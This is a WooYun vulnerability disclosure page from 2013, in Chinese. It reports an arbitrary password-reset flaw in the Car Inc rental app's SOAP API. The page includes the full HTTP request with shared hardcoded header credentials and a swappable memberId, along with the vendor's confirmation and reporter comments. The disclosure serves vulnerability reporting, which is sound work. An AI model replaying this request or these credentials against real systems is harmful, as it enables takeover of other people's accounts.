神州租车任意用户密码修改漏洞 | wooyun-2013-044826| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-044826

漏洞标题：神州租车任意用户密码修改漏洞

漏洞作者：带馅儿馒头

提交时间：2013-12-03 19:48

修复时间：2014-01-17 19:48

公开时间：2014-01-17 19:48

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2013-12-03：细节已通知厂商并且等待厂商处理中
2013-12-05：厂商已经确认，细节仅向厂商公开
2013-12-15：细节向核心白帽子及相关领域专家公开
2013-12-25：细节向普通白帽子公开
2014-01-04：细节向实习白帽子公开
2014-01-17：细节向公众公开

简要描述：

能够随意修改并登陆任意用户帐号~好吧~我其实是来求礼物的~~~

详细说明：

问题出在神州租车的app端，校验机制设计的太脆弱~
下面是修改用户个人资料的请求数据包，数据包中的验证部分account、password居然是公共的所有用户的验证都是同样的值，又没有其他的验证机制，那么这里肯定可以修改任意用户的值~

POST http://sdk.zuche.com/CARSDK/services/zuche1 HTTP/1.1
Host: sdk.zuche.com
Connection: close
Accept-Encoding: gzip
Content-Type: text/xml; charset=utf-8
Content-Length: 526
Connection: close
SOAPAction: http://sdk.zuche.com/CARSDK/services/zuche1?UpdateUser
User-Agent: 神州租车 2.6 (iPhone; iPhone OS 7.0.4; zh_CN)
<?xml version='1.0' encoding='utf-8'?>
<soap:Envelope xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance' xmlns:xsd='http://www.w3.org/2001/XMLSchema' xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'>
<soap:Header>
<CheckSoap xmlns='http://tempuri.org/'>
<Account>szzciphone</Account>
<Password>szzc#iphone</Password>
</CheckSoap>
</soap:Header>
<soap:Body>
<UpdateUser xmlns='http://tempuri.org/'>
<User>{"memberId":"3xxxx3","password":"123qwe","emailaddress":"xxxxx@sina.cn"}</User>
</UpdateUser>
</soap:Body>
</soap:Envelope>

所以，我们通过修改memberId就能修改任意用户的信息，通过测试这里的emailaddress参数如果为空，将不会更改用户原来设置的值，修改不同id用户的密码后，系统会返回该用户的帐号信息（手机号码），那么有了手机号码，我们就能登陆任意用户的帐号，下面是我自己的帐号测试结果；

下面我们随意测试一个用户的帐号吧；

这个就是证明咯；

漏洞证明：

见详细说明

修复方案：

各种校验，没说的~

版权声明：转载请注明来源带馅儿馒头@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：11

确认时间：2013-12-05 17:14

厂商回复：

感谢提醒，正在修复

漏洞评价：

2013-12-03 21:56 | 校长 ( 实习白帽子 | Rank:40 漏洞数:10 | 本人受《中华人民共和国未成年人保护法》《...)

@带馅儿馒头洞主
2013-12-04 10:27 | 小川 ( 核心白帽子 | Rank:1344 漏洞数:216 | 一个致力要将乌云变成搞笑论坛的男人)

@带馅儿馒头洞主最近撸的有点多了，注意身体,可联系我，帮你提交
2013-12-04 11:22 | 带馅儿馒头 ( 普通白帽子 | Rank:1278 漏洞数:143 | 心在，梦在)

@小川哈哈，川总，你的米3拿到木有～
2013-12-04 12:37 | 校长 ( 实习白帽子 | Rank:40 漏洞数:10 | 本人受《中华人民共和国未成年人保护法》《...)

@带馅儿馒头馒头求罩
2013-12-04 12:41 | 带馅儿馒头 ( 普通白帽子 | Rank:1278 漏洞数:143 | 心在，梦在)

@校长校长，我考试及格全靠你了~~
2013-12-04 15:08 | 小川 ( 核心白帽子 | Rank:1344 漏洞数:216 | 一个致力要将乌云变成搞笑论坛的男人)

@带馅儿馒头早就拿到了

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-044826

漏洞标题：神州租车任意用户密码修改漏洞

相关厂商：神州租车

漏洞作者：带馅儿馒头

提交时间：2013-12-03 19:48

修复时间：2014-01-17 19:48

公开时间：2014-01-17 19:48

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源带馅儿馒头@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-044826

漏洞标题：神州租车任意用户密码修改漏洞

相关厂商：神州租车

漏洞作者： 带馅儿馒头

提交时间：2013-12-03 19:48

修复时间：2014-01-17 19:48

公开时间：2014-01-17 19:48

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2013-044826"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 带馅儿馒头@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：带馅儿馒头

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源带馅儿馒头@乌云